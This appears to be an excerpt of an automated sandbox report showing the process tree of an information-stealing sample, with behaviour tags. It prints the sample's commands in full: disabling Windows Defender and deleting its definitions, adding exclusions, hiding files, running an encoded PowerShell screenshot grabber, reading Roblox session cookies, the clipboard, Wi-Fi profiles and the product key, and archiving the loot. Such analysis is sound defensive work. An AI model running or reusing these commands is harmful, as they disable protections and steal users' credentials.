        C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
        5⤵
        
        PID:4516
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
        6⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:6080
      - C:\Program Files\Windows Defender\MpCmdRun.exe
        
        "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
        6⤵
        Deletes Windows Defender Definitions
        
        PID:3832
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
        5⤵
        
        PID:1584
      - C:\Windows\system32\tasklist.exe
        
        tasklist /FO LIST
        6⤵
        Enumerates processes with tasklist
        
        PID:4452
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
        5⤵
        
        PID:3268
      - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic csproduct get uuid
        6⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:1672
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"
        5⤵
        
        PID:4480
      - C:\Windows\system32\reg.exe
        
        REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
        6⤵
        
        PID:1628
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"
        5⤵
        
        PID:5204
      - C:\Windows\system32\reg.exe
        
        REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
        6⤵
        
        PID:5992
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
        5⤵
        
        PID:2920
      - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic path win32_VideoController get name
        6⤵
        Detects videocard installed
        Suspicious behavior: EnumeratesProcesses
        
        PID:4996
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
        5⤵
        
        PID:5716
      - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic path win32_VideoController get name
        6⤵
        Detects videocard installed
        
        PID:2556
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\Admin\Downloads\Built.exe""
        5⤵
        Hide Artifacts: Hidden Files and Directories
        
        PID:1884
      - C:\Windows\system32\attrib.exe
        
        attrib +h +s "C:\Users\Admin\Downloads\Built.exe"
        6⤵
        Views/modifies file attributes
        
        PID:1976
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\   .scr'"
        5⤵
        
        PID:3100
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\   .scr'
        6⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4724
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
        5⤵
        
        PID:5976
      - C:\Windows\system32\tasklist.exe
        
        tasklist /FO LIST
        6⤵
        Enumerates processes with tasklist
        
        PID:5252
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
        5⤵
        
        PID:5316
      - C:\Windows\system32\tasklist.exe
        
        tasklist /FO LIST
        6⤵
        Enumerates processes with tasklist
        
        PID:3504
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
        5⤵
        
        PID:4916
      - C:\Windows\System32\Wbem\WMIC.exe
        
        WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
        6⤵
        
        PID:5368
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
        5⤵
        Clipboard Data
        
        PID:1940
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Get-Clipboard
        6⤵
        Clipboard Data
        
        PID:2172
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tree /A /F"
        5⤵
        
        PID:5592
      - C:\Windows\system32\tree.com
        
        tree /A /F
        6⤵
        
        PID:1776
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
        5⤵
        
        PID:5580
      - C:\Windows\system32\tasklist.exe
        
        tasklist /FO LIST
        6⤵
        Enumerates processes with tasklist
        
        PID:3512
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
        5⤵
        System Network Configuration Discovery: Wi-Fi Discovery
        
        PID:3588
      - C:\Windows\system32\netsh.exe
        
        netsh wlan show profile
        6⤵
        Event Triggered Execution: Netsh Helper DLL
        System Network Configuration Discovery: Wi-Fi Discovery
        
        PID:1472
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "systeminfo"
        5⤵
        
        PID:3180
      - C:\Windows\system32\systeminfo.exe
        
        systeminfo
        6⤵
        Gathers system information
        
        PID:6096
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"
        5⤵
        
        PID:4332
      - C:\Windows\system32\reg.exe
        
        REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
        6⤵
        
        PID:3556
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
        5⤵
        
        PID:3836
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
        6⤵
        
        PID:4852
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"
        5⤵
        
        PID:644
      - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        6⤵
        
        PID:3832
      - C:\Windows\system32\attrib.exe
        
        attrib -r C:\Windows\System32\drivers\etc\hosts
        6⤵
        Drops file in Drivers directory
        Views/modifies file attributes
        
        PID:3252
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tree /A /F"
        5⤵
        
        PID:1944
      - C:\Windows\system32\tree.com
        
        tree /A /F
        6⤵
        
        PID:5928
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"
        5⤵
        
        PID:4332
      - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        6⤵
        
        PID:1628
      - C:\Windows\system32\attrib.exe
        
        attrib +r C:\Windows\System32\drivers\etc\hosts
        6⤵
        Drops file in Drivers directory
        Views/modifies file attributes
        
        PID:5936
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tree /A /F"
        5⤵
        
        PID:4916
      - C:\Windows\system32\tree.com
        
        tree /A /F
        6⤵
        
        PID:4892
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
        5⤵
        
        PID:3728
      - C:\Windows\system32\tasklist.exe
        
        tasklist /FO LIST
        6⤵
        Enumerates processes with tasklist
        
        PID:5928
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tree /A /F"
        5⤵
        
        PID:1220
      - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        6⤵
        
        PID:3252
      - C:\Windows\system32\tree.com
        
        tree /A /F
        6⤵
        
        PID:2080
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tree /A /F"
        5⤵
        
        PID:2316
      - C:\Windows\system32\tree.com
        
        tree /A /F
        6⤵
        
        PID:5476
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tree /A /F"
        5⤵
        
        PID:1968
      - C:\Windows\system32\tree.com
        
        tree /A /F
        6⤵
        
        PID:3928
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
        5⤵
        
        PID:4848
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        6⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1056
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /PID 4352"
        5⤵
        
        PID:4048
      - C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 4352
        6⤵
        Kills process with taskkill
        
        PID:3584
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /PID 5128"
        5⤵
        
        PID:1740
      - C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 5128
        6⤵
        Kills process with taskkill
        
        PID:3928
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
        5⤵
        
        PID:2848
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        6⤵
        
        PID:6048
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /PID 5360"
        5⤵
        
        PID:5160
      - C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 5360
        6⤵
        Kills process with taskkill
        
        PID:2864
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /PID 5292"
        5⤵
        
        PID:2888
      - C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 5292
        6⤵
        Kills process with taskkill
        
        PID:1672
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /PID 5376"
        5⤵
        
        PID:5976
      - C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 5376
        6⤵
        Kills process with taskkill
        
        PID:5012
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /PID 3660"
        5⤵
        
        PID:6104
      - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        6⤵
        
        PID:5592
      - C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 3660
        6⤵
        Kills process with taskkill
        
        PID:4580
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /PID 2804"
        5⤵
        
        PID:3588
      - C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 2804
        6⤵
        Kills process with taskkill
        
        PID:5048
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /PID 5224"
        5⤵
        
        PID:4260
      - C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 5224
        6⤵
        Kills process with taskkill
        
        PID:60
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /PID 4556"
        5⤵
        
        PID:4648
      - C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 4556
        6⤵
        Kills process with taskkill
        
        PID:2328
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /PID 4628"
        5⤵
        
        PID:4076
      - C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 4628
        6⤵
        Kills process with taskkill
        
        PID:5836
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /PID 4388"
        5⤵
        
        PID:5300
      - C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 4388
        6⤵
        Kills process with taskkill
        
        PID:5264
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "getmac"
        5⤵
        
        PID:5020
      - C:\Windows\system32\getmac.exe
        
        getmac
        6⤵
        
        PID:1868
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI54562\rar.exe a -r -hp"123" "C:\Users\Admin\AppData\Local\Temp\k1Z9C.zip" *"
        5⤵
        
        PID:4832
      - C:\Users\Admin\AppData\Local\Temp\_MEI54562\rar.exe
        
        C:\Users\Admin\AppData\Local\Temp\_MEI54562\rar.exe a -r -hp"123" "C:\Users\Admin\AppData\Local\Temp\k1Z9C.zip" *
        6⤵
        Executes dropped EXE
        
        PID:4920
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "wmic os get Caption"
        5⤵
        
        PID:3516
      - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic os get Caption
        6⤵
        
        PID:1284
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
        5⤵
        
        PID:408
      - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic computersystem get totalphysicalmemory
        6⤵
        
        PID:768
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
        5⤵
        
        PID:2584
      - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic csproduct get uuid
        6⤵
        
        PID:1660
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
        5⤵
        
        PID:5156
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        6⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2388
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
        5⤵
        
        PID:3980
      - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic path win32_VideoController get name
        6⤵
        Detects videocard installed
        
        PID:4040
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
        5⤵
        
        PID:5956
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
        6⤵
        
        PID:4556

C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.4467_none_7e0f83e07c8c1985\TiWorker.exe
